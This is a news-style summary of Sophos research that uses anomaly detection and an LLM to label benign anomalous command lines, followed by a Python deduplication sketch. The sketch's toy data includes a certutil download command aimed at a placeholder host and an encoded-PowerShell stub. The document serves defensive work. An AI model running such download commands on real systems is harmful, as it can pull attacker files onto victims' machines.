
Researchers Improve Cybersecurity Command-Line Classification with Anomaly Detection and LLMs
Researchers Ben Gelman and Sean Bergeron of Sophos presented a method for improving cybersecurity command-line classification that uses anomaly detection and large language models (LLMs) to find and label benign anomalous data. Traditional anomaly detection, used directly to flag malicious activity, produces too many false positives at scale: a 2% false-positive rate across 100 million commands yields 2 million false alarms. Their approach sidesteps this limitation by using an LLM such as OpenAI’s o3-mini to pick out the benign anomalies with high precision. The system ran several anomaly detection algorithms to surface diverse anomalies: Isolation Forest on the full-scale data, and K-Means and PCA on reduced-scale data. The resulting candidates were deduplicated using embeddings and cosine similarity before being sent to the LLM for labeling. Evaluated against two baselines (regex-based labeling and aggregated labeling), the augmented models showed significant gains, with AUROC improving from 61 to 89 on the harder "manual labels" test set. The method also proved scalable: performance saturated after only a few days of data, and accuracy on the original distribution was maintained or improved. Key tools included XGBoost for classification, Jina embeddings for feature extraction, and distributed computing to handle billions of command lines per day. The researchers drew three conclusions: anomaly detection excels at finding benign long-tail data, LLMs enable automated labeling pipelines, and benign anomaly augmentation generalizes as a way to strengthen cybersecurity models.
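
The deduplication step mentioned above (embeddings plus cosine similarity) can be illustrated with a minimal sketch. This is not the researchers' implementation: the greedy keep-or-drop strategy, the 0.95 threshold, the function names, and the three-dimensional toy vectors are all assumptions made for illustration. In a real pipeline the vectors would come from an embedding model rather than being written by hand.

```python
import math


def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0.0 or norm_b == 0.0:
        return 0.0  # treat a zero vector as similar to nothing
    return dot / (norm_a * norm_b)


def deduplicate(items, threshold=0.95):
    """Greedy near-duplicate removal (hypothetical helper).

    `items` is a list of (command, embedding) pairs. An item is kept only
    if its similarity to every already-kept item is below `threshold`.
    """
    kept = []
    for command, vector in items:
        if all(cosine_similarity(vector, kv) < threshold for _, kv in kept):
            kept.append((command, vector))
    return kept


# Toy anomaly candidates with hand-written stand-in embeddings (assumed values).
candidates = [
    ("powershell -enc AAAA", [0.90, 0.10, 0.00]),
    ("powershell -enc BBBB", [0.89, 0.11, 0.01]),  # near-duplicate of the first
    ("certutil -urlcache -f http://example.test/a", [0.10, 0.90, 0.20]),
    ("tar -czf backup.tgz /var/log", [0.00, 0.20, 0.95]),
]

unique = deduplicate(candidates, threshold=0.95)
unique_commands = [command for command, _ in unique]
print(unique_commands)
```

Removing near-duplicates before labeling means the LLM is asked about each distinct kind of anomaly once instead of many times, which keeps labeling cost proportional to the variety of the anomalies rather than their raw count. The greedy pass compares each candidate against every kept item, so at the scale described above it would need an approximate nearest-neighbor index or a distributed equivalent.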